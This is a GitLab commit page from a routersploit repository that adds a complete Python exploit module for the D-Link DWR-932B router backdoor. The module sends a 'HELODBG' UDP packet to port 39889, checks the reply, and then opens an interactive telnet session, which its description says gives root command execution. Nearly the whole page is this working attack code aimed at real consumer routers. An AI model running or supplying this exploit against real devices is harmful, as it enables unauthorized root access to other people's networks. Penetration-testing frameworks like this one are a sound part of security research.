Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
27168c10
Commit
27168c10
authored
Oct 19, 2016
by
Marcin Bury
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
D-Link DWR-932B Backdoor exploit
parent
57ce54e2
Show whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
75 additions
and
0 deletions
+75
-0
dwr_932b_backdoor.py
routersploit/modules/exploits/dlink/dwr_932b_backdoor.py
+75
-0
No files found.
routersploit/modules/exploits/dlink/dwr_932b_backdoor.py
0 → 100644
View file @
27168c10
import
socket
import
telnetlib
from
routersploit
import
(
exploits
,
print_error
,
print_success
,
print_status
,
mute
,
)
class
Exploit
(
exploits
.
Exploit
):
"""
Exploit implementation for D-Link DWR-932B backdoor vulnerability.
If the target is vulnerable, telnet access is provided with root privileges.
"""
__info__
=
{
'name'
:
'D-LINK DWR-932B'
,
'description'
:
'Module exploits D-Link DWR-932B backdoor vulnerability which allows executing command on operating system level with root privileges.'
,
'authors'
:
[
'Pierre Kim @PierreKimSec'
,
# vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://pierrekim.github.io/advisories/2016-dlink-0x00.txt'
,
],
'devices'
:
[
'D-Link DWR-932B'
,
]
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. 192.168.1.1'
)
port
=
exploits
.
Option
(
80
,
'Target Port'
)
def
run
(
self
):
sock
=
socket
.
socket
(
socket
.
AF_INET
,
socket
.
SOCK_DGRAM
)
print_status
(
"Sending backdoor packet..."
)
try
:
sock
.
sendto
(
"HELODBG"
,
(
self
.
target
,
39889
))
response
=
sock
.
recv
(
1024
)
except
:
pass
sock
.
close
()
if
"Hello"
in
response
:
print_success
(
"Target seems to vulnerable"
)
print_status
(
"Trying to connect to the telnet service {}:{}"
.
format
(
self
.
target
,
23
))
try
:
tn
=
telnetlib
.
Telnet
(
self
.
target
,
23
)
tn
.
interact
()
except
:
print_error
(
"Exploit failed - could not connect to the telnet service"
)
else
:
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
@mute
def
check
(
self
):
sock
=
socket
.
socket
(
socket
.
AF_INET
,
socket
.
SOCK_DGRAM
)
try
:
sock
.
sendto
(
"HELODBG"
,
(
self
.
target
,
39889
))
response
=
sock
.
recv
(
1024
)
if
"Hello"
in
response
:
sock
.
sendto
(
"BYEDBG"
,
(
self
.
target
,
39889
))
return
True
# target is vulnerable
except
:
pass
return
False
# target is not vulnerable
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment
